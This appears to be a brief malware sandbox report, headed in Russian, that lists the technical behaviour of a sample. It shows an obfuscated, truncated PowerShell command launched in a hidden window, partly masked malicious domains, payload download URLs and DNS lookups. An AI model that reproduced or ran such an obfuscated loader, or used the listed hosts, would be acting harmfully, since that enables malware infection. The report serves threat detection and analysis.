Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$( sEt-itEm 'vaRIaBLe:OFS' '')" +[STRINg]( '26b95>72%81~121@87w30i3@30o80>91i73F19>81{92i84~91F93~74%30{76o95>80%90~81>83i5~26b110%111>107i119w122i119%30@3i30w80F91F73b19%81w92>84b91w93o74F30...
- 'co#####evienthong.com':80
- 'si###ight.com':80
- http://www.co#####evienthong.com/x9hf0FvE/
- http://www.co#####evienthong.com/x9hf0FvE
- http://www.si###ight.com/uC01tQDF/
- DNS ASK co#####evienthong.com
- DNS ASK tp###rqf.com
- DNS ASK si###ight.com
- DNS ASK gr###graff.net
- DNS ASK me###.atwaar.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$( sEt-itEm 'vaRIaBLe:OFS' '')" +[STRINg]( '26b95>72%81~121@87w30i3@30o80>91i73F19>81{92i84~91F93~74%30{76o95>80%90~81>83i5~26b110%111>107i119w122i119%30@3i30w80F91F73b19%81w92>84b91w93o74F30...' (со скрытым окном)